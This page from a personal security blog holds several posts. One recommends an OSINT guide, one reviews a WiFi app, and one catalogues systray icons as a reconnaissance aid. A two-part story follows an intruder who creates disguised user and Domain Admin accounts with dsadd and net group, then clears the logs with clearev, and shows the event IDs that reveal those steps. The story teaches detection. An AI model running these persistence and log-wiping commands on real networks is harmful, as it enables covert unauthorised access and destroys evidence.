Lee aquí tus blogs preferidos...

Syn

Adventures of a Security Junkie
  • Know Your Enemy
    I haven't posted for a bit because to be honest I haven't had much to say about security that might be interesting. I have been active on my Cisco Basics blog though for anyone interested in that type of thing.


    I'll get to the point of this post though, recently I was emailed by a guy called Matt. In his email Matt suggested maybe we bounce a few ideas off each other for future blog stuff. To me this sounded great as I needed something to motivate me to get posting again but as most security people know, we can be a pretty suspicious and paranoid bunch. So I did a little digging on Matt, nothing too much just the run of the mill Google Fu and a little Maltego. Once I'd satisfied myself that Matt was probably Matt I emailed back and we began to chat. As it turned out Matt really knows his stuff and his site AttackVector is superb.




    The night before last I was reading Matt's article on Invasion of Privacy and the reason I'm bringing to your attention is because it is hands down the best example of personal information gathering that I have read. Matt's subject was a spammer (what goes around comes around) but the same techniques that he describes can be employed against any target. He uses DNS, Whois, Facebook, LinkedIn, Goggle and other easily accessible services to research his target and gather data that most people probably don't even realise is out there. I strongly recommend that readers head over to Matt's site and check out his article called Invasion of Privacy to see how it's really done.

    Truly scarey stuff!!!



  • WiFi Analyzer - Another Great App For The Wifi Toolbox
    Every now and then I come across a iPhone app that has some of the features that my ultimate wardriving app would have. Wifi analyzer is no different, it hasn't got all of my wishlist features but it certainly has a few.

    The features I'm talking about are useful from a wardriving perspective but even more useful for siting my Access Point or when trying to find to get the best signal. Another use would be when tracking down that rogue access point that I might have detected.

    When firing up WiFi Analyzer I'm presented with a list of Access Points, the signal strength and the encryption in use. This is all pretty standard stuff that all my other WiFi apps do.




    I can drill down into the individual Access Points but what I really like is being able to select an Access Point and home in on it by signal strength.



    Here I can easily see when I am getting the best signal as I move around. This also makes pinpointing those rogue Access Points a piece of cake.

    Another feature I really like with Wifi Analyzer is the graph feature.



    Here I can see overlapping networks and I'll be able to make educated decisions on the selection of the channel to use for my AP to prevent interference from neighbors AP's. Alternatively I could use WiFi Analyzers recommendations.



    All in all a pretty handy tool to add to your iPhone toolbox in my opinion.

    UPDATE: Apple have removed this and the other wardriving apps from the app store. The bunch of dicks!!!!!

    Oh well, jailbreaking looks all the more tempting now.


  • Systray Recognition System
    Impressive title eh. Well okay I'll admit it, the system is effectively this blog post and your ability to inconspicuously squint as you take in all the systray icons on other peoples computers.

    What's the Systray?
    The Systray is the area on the windows taskbar near the clock, properly referred to as the Notification Area I think. Often installed programs will display a small icon here indicating that they are running and the icon may change depending on the state of the program. It's important that attention is paid to the subtle differences in the icons, for example, a slight colour change may indicate that a program is running or not running.


    Why blog about this?
    Well I'm always checking out other peoples systray icons and wondering what programs they represent. After not having much luck with finding a good list on the web to refer to I thought I would create one. I have set myself a goal of seeing how many icons I can get in the list within the month of February. I'll continue to add new ones after that but this will be my focus in February because I'm going to be quite busy at work and I'm studying for an exam at the end of the month.


    Why is the relevance to security?
    Recognising systray icons will not only tell you about the software installed and the state of that software (running, not running, enabled, disabled, version etc...) but will also tell you about the person using the computer (Geek, salesman, lazy, Hax0r etc...) and we all know that smart hackers hack people not just computers. Systray icons will also tell you if that person is connected back to the office, if they are running encryption software etc... These are all the things that i'm interested in and I imagine some people reading my blog are interested in as well. If you need any further convincing I suggest you watch Johnny Longs excellent "No Tech Hacking" presentation.

    Any comments, suggestions, corrections or submissions will be greatly appreciated. So lets bring on the icons!


    Remote Management

    VNC server -Not connected

    VNC Server - Connected

    Remotely Anywhere

    Logmein


    Anti-Virus / Security

    Avira - running

    Avira - Not Running

    McAffee

    McAfee On Access Scanner

    Norton

    Sophos - Running

    Sophos - Out of date

    Sophos - Disabled

    AVG - old version

    AVG - V 8.5

    AVG - V 8.5 - Outdated / Connection failed

    AVG - Running

    AVG - Paused

    Kaspersky

    Avast

    ZoneAlarm – No Traffic

    ZoneAlarm – Internet Locked

    ZoneAlarm - Running

    Microsoft Defender - Active

    Microsoft Defender - Running

    PCTools Threatfire - Enabled

    PCTools Threatfire - Disabled

    Tiny Personal Firewall v 2.0.15



    Communication

     Bluetooth - Disabled

    Bluetooth - Enabled

    Cisco VPN - Not connected

    Cisco VPN - Connected

    Wifi - Connected

    Wifi - Not Connected

    LAN - Connected

    LAN - Disconnected

    Cisco Network Magic - Running

    Cisco Network Magic - Not Running



    Encryption

     WinPT

    PGP

    TrueCrypt

    Sanctuary



    Other

    MS Security Center - Warning

    MS Windows Updates - Warning

    MS Office 2003

     VMWare Tools installed

    MS Outlook - New Mail

    Synaptec Pointing Device

    xampp

    Night Watchman Power Management

    Daemon Tools

    Daemon Tools - Emulation Enabled

    Daemon Tools - Emulation Disabled

    Realtek HD audio Manager

    Unlocker Assistant

    SIW


    Thanks to the following for submitting icons:

    Jimmy
    Dave
    James
    Charz
    Mark


  • What Bob Did. What Alice Saw - Part 2
    This is the 2nd part of the story which is all about Bob the evil hacker and Alice the overworked Sys Admin.

    In the previous post Bob was using some of his command line Kung Fu to carefully analyse the Walliford Active Directory before creating some very inconspicuous admin and user accounts. Bob being the careful kind of guy that he is also attempted to cover his tracks by deleting the logs on the victim server.

    In this post I'll be looking at how Alice might have spotted all Bobs actions if she was following 2 best practices:

    1) Analysing the logs.
    2) Logging to another server.


    Part 2 - What Alice Saw

    Alice turns up at the office a few minutes early as usual. She likes to get in, grab her coffee and then start on her daily tasks. First she checks her emails for anything urgent, then the helpdesk, and finally she gets to her server logs. The information that windows logs can be pretty overwhelming, luckily Alice has a few filters that she can apply to look for key events.

    What Alice ideally wants to know is what accounts have been added or deleted and what groups have been modified. She keeps a list of the events that she needs to watch out for to spot these types of activities. Other interesting events that Alice keeps a close eye on are those for people logging into servers, bad passwords and account lockouts.


    Her daily log analysis isn't her favorite job, but it's an important one. She would love to get her boss to pay for a tool to do the log correlation but unfortunately he doesn't see it as an important enough task. As soon as Alice finds the time and starts looking through the logs she starts to worry. She see's a whole bunch of login failures from earlier that morning.



    On closer inspection Alice sees some very strange looking account names like metasploit.



    After those entries Alice sees an event 624 Which indicates a new account has been created for a user called Bob Ball.



    Alice checks the helpdesk to see if a call was raised for a new employee called Bobby Ball, it wasn't.

    Next Alice can see an event 632 that shows that the new account has been added to the HR group.



    She makes a quick call to HR and finds that they know nothing of this mysterious account. Alice disables the account until she can get to the bottom of what's going on.

    Just as Alice finds a few minutes to spare she goes back to her logs and then her phone rings. As she's summoned to a project meeting she thinks that the logs will have to wait. Unfortunately the meeting takes up the rest of her day.

    The next day Alice gets to the office extra early so she can catch up with her tasks. However, on connecting to her server she finds the logs are almost completely empty. All the entries from the previous day had been cleared. The oldest event is a event 517 which shows that the logs have been cleared.



    As Alice sits back and thinks about things she convinced that some evil hacker has tried to break into her network, she counts her lucky stars that she spotted the hackers account and disabled it quickly before any damage was done.

    The End



    Okay, I know my story is pretty crap but I bring all this log stuff up because had recently had a conversation with someone who didn't realise just how much useful information was contained in the Windows security event logs. This post is just really to highlight 2 things. Get your logs off the server, there are plenty of great tools to do that, unfortunately they all cot a bit. Secondly, build time into your day to analyse the logs. Find out the important events and find a way to filter the logs to spot when something is wrong.

    If you want to learn more about the Windows Event Logs check out Randy Franklin Smiths site Ulitimate Windows Security. His site is without doubt the best resource for learning about the windows security logs I have ever found, and his webcasts are pretty amazing.


  • What Bob Did. What Alice Saw - Part 1
    Recently I've been have way to much fun looking at event logs and digging out which events are indicators of a compromise. As is typical for me I'll try to wrap some of that knowledge up into a little Bob story. So here goes.


    Part 1 - What Bob did.

    Bob has been up to his old tricks again and has found himself on the wrong side of someones firewall. Well maybe not the wrong side as far as Bob is concerned but it certainly is for Alice, our Systems Administrator. Bob being Bob decides to start his day with a little pwnage, he hunts around for a target and after a little scanning decides to go with a wide open domain controller which he likes to call 10.0.1.233, or as Alice would call it, Server04.


    Bob, sporting his brand new installation of BackTrack4 , decides to test drive the fantastic Fast-Track scripts. He uses Fast-Track not because he's lazy or can't be bothered to learn Metasploit, but because he only has a few minutes before work and he needs to get his pwnage on pretty sharpish.



    After successfully getting his Meterpreter session Bob uses the shell command to drop down to a Command prompt. Once at the prompt he decides to list the users on the domain.

    net user /domain



    The resulting list is quite long and split into 3 columns, as Bob intends to extract the user list to use in future scripts he decides to make use of the DSQUERY command to give him the list in a nice single line list.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname



    With that done Bob decides to go ahead and quickly create a couple of accounts. He wants to create 2 accounts, one as a user because after all thats where the data is right. The other account will be an administrative user because that will help him get to other interesting places on the network. Another good reason for having 2 accounts is if Wallifords discover his intrusion they'll likely try to identify the intruders user account and may well stop when they find the first one. Cunning eh!

    Now in the past Bob has used "Net User username password /add" to do this, but that will create an account that even the crappiest of admins will spot. What Bob needs to do is create an account that blends in with the rest of the user accounts, to do this he takes a look at a few user accounts that already exist to see what account properties are populated as standard.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=jimm))" -limit 0 -attr *



    From here Bob can see that the user Jim Morrison has a Title, Office, Display Name, telephone Number and Home Drive fields neatly populated as do many of the other users. Armed with that knowledge Bob creates an account with DSADD that will sit nicely with the other accounts in the same Organisational Unit.

    dsadd user "CN=Bob Ball,OU=Internal,DC=walliford,DC=local" -Samid BobB -Pwd Eviluser123 -fn Bob -Ln Ball -Display "Bob Ball" -Office Leeds -Tel "01233 455779" -Dept HR -hmdir \\wal-filer\users\BobB -Title Manager -upn BobB@walliford.local



    Bob checks his handy work before he moves onto his next task.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=BobB))" -limit 0 -attr *



    Now Bob wants to give this user account access to some data, and that will be done by making Bob a member of some groups.

    dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name



    So there is the list of groups but lets take a closer look at the HR one first.

    dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr *


    Okay that'll do. Bob just needs to modify the properties with DSMOD to add his user account as a member.

    dsmod group "CN=HR,OU=Internal,DC=walliford,DC=local" -addmbr "CN=Bob Ball,OU=Internal,DC=walliford,DC=local"




    With that sorted Bob wants to create his admin user. hmmm something that wont stand out again. He models the account of other built-in accounts and sets his password to never expire. Hopefully this won't raise any eyebrows.

    dsadd user "CN=Cert Owner,CN=Users,DC=walliford,DC=local" -Samid CertOwner -Pwd EvilAdmin123 -Desc "Built-in account for administering certificates" -Display "Domain Certificate Owner" -pwdneverexpires yes

    Brilliant. No need to go to town on the groups again. This time he's adding the account straight into Domain Admins.

    net group "Domain Admins" CertOwner /add




    With that done Bob decides he really needs to get off to work.

    Whilst Bobs at work he's slightly troubled that he may have left traces in the logs on the server he compromised. As soon as he gets home he hops back onto the network and just for fun connect through RDP to the server to test his account.



    Works like a charm. He has a quick look around and logs off the RDP session. Then Bob remembers what he was supposed to be doing. He gets a new Meterpreter session up and issues the command to clear the logs

    clearev



    All sorted. Now it's dinner time, pie and chips tonight.

    Coming up...What Alice Saw.